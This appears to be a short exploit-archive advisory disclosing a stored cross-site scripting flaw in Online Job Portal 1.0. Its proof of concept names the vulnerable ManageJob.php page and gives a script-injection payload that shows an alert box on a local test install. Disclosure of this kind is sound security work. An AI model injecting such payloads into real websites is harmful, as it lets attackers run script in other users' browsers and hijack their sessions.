Online Job Portal 1.0 Cross Site Scripting

Online Job Portal version 1.0 suffers from a persistent cross site scripting vulnerability.


MD5 | d6642d1a84f86dc55e84952272e0564a

# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/17
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A

Proof of Concept:

1 - Open URL http://localhost/jobportal/Employer/ManageJob.php

2 - Fill in the blanks with this payload: "><script>alert (1)</script>

3 - And click submit button.

Related Posts